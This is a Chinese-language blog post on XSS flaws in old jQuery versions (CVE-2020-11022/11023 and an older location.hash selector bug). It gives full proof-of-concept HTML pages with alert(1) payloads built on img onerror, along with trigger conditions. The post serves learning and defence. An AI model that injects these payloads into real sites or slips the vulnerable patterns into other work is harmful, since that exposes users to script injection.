JQuery的XSS初探 一年前上课时搜到的问题,当时正在学习JQuery开发
我对JQuery开发是不怎么感兴趣的:前后端分离项目都是清一色的Vue和React,前后端不分离也有Alpine.js,Layui这种更贴近原生JS的解决方案。这篇帖子旧纪录下我所看到的情况。
反正XSS(跨站脚本)不算洞,对吧🤣
CVE-2020-11022/CVE-2020-11023 https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html
该靶场提供了有关CVE-2020-11022/CVE-2020-11023的测试,影响范围从JQuery V1.2.0-V3.5.0
复现代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 <!DOCTYPE html > <html > <head > <meta charset ="utf-8" > <title > jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title > <script src ="https://cdn.bootcss.com/jquery/3.4.1/jquery.js" > </script > </head > <body > <script > function test (n,jq ){ sanitizedHTML = document .getElementById ('poc' +n).innerHTML ; if (jq){ $('#div' ).html (sanitizedHTML); }else { div.innerHTML =sanitizedHTML; } } </script > <h1 > jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</h1 > <p > PoCs of XSS bugs fixed in <a href ="//blog.jquery.com/2020/04/10/jquery-3-5-0-released/" > jQuery 3.5.0</a > . You can find the details in my blog post: <a href ="//mksben.l0.cm/2020/05/jquery3.5.0-xss.html" > English</a > </p > <h2 > PoC 1</h2 > <button onclick ="test(1)" > Assign to innerHTML</button > <button onclick ="test(1,true)" > Append via .html()</button > <xmp id ="poc1" > <style > <style /> <img src =x onerror =alert(1) > </xmp > <h2 > PoC 2 (Only jQuery 3.x affected)</h2 > <button onclick ="test(2)" > Assign to innerHTML</button > <button onclick ="test(2,true)" > Append via .html()</button > <xmp id ="poc2" > <img alt ="<x" title ="/><img src=x onerror=alert(1)>" > </xmp > <h2 > PoC 3</h2 > <button onclick ="test(3)" > Assign to innerHTML</button > <button onclick ="test(3,true)" > Append via .html()</button > <xmp id ="poc3" > <option > <style > </option > </select > <img src =x onerror =alert(1) > </style > </xmp > <div id ="div" > </div > </body > </html >
触发条件:
系统使用 jQuery 的 html()、append() 或 $('<tag>')
等方法处理用户输入;
用户输入已经过“消毒”(sanitize)处理。
Mitre对该漏洞的描述
passing HTML from untrusted sources - even after sanitizing it - to one of jQuery’s DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.
感觉下面这篇CSDN说的不错了,偷懒不写了
Web安全-JQuery框架XSS漏洞浅析
正在表达式没有覆盖导致的问题
与这个漏洞相关的pwnfuction题目
DOM型 XSS(CVE-2016-7103等) 正则表达式存在缺陷,导致location.hash
跨站脚本攻击
Jquery BigTracker
复现代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 <!DOCTYPE html > <html lang ="zh" > <head > <title > Jquery XSS</title > <script type ="text/javascript" src ="https://cdn.bootcss.com/jquery/1.6.1/jquery.js" > </script > <script > $(function ( ) { var e= location.hash .split ('#' )[1 ]; $(e) }) </script > </head > <body > <h1 > JQuery with XSS Demo</h1 > <li > <a href ="#<img src=/ οnerrοr=alert(1)>" target ="_blank" > Click here!</a > </li > </body > </html >
上古老洞🤣,Chrome和Firefox都无法触发(貌似是被转义了),要用IE才能测试出来。
资料 query XSS漏洞(CVE-2020-11022)